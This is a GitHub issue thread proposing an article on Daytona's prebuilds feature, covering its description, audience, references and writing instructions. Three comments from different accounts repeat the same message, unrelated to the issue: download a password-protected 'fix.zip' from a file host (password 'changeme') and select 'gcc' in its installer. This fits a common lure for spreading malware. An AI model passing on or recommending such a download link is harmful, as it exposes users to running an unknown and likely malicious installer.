### ISSUE TITLE
Prebuilds in Daytona 

### ISSUE THREAD

**Issue by nkkko** [daytonaio/content#82]
### Content Type
Article

### Article Description
This article introduces the new prebuilds feature from Daytona v0.26.0, designed to streamline and accelerate project setup by leveraging automated builds. The content will explain how prebuilds listen to repository changes and trigger builds, ensuring faster project creation times. Detailed instructions on how to add prebuilds, configure commit intervals, and use specific trigger files will be provided. Additionally, the article will cover how to view and manage builds using Daytona commands, along with necessary breaking changes and installation steps.

### Target Audience
Developers, DevOps professionals, and software engineers who use Daytona for managing and deploying workspaces, especially those working with GitHub repositories and looking to optimize their development workflows.

### References/Resources
- [Daytona Docs - Prebuilds](https://daytona.io/docs/prebuilds)
- [Daytona Releases - v0.26.0](https://github.com/daytonaio/daytona/releases/)

### Examples
- Explaining the process of adding a prebuild for a specific project configuration and Git branch.
- Step-by-step guides on configuring commit intervals and trigger files.
- Example commands for viewing and managing builds.

### Special Instructions
Ensure that the article includes detailed step-by-step instructions with command examples and screenshots where applicable. Highlight the new prebuilds functionality and its benefits for speeding up development workflows. Mention the currently supported GitHub provider and tease other upcoming options. Include a section on breaking changes and necessary SQL commands for database migration.

**Comment by qlqw233** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by NhutDang2002** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Wanderx13** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."
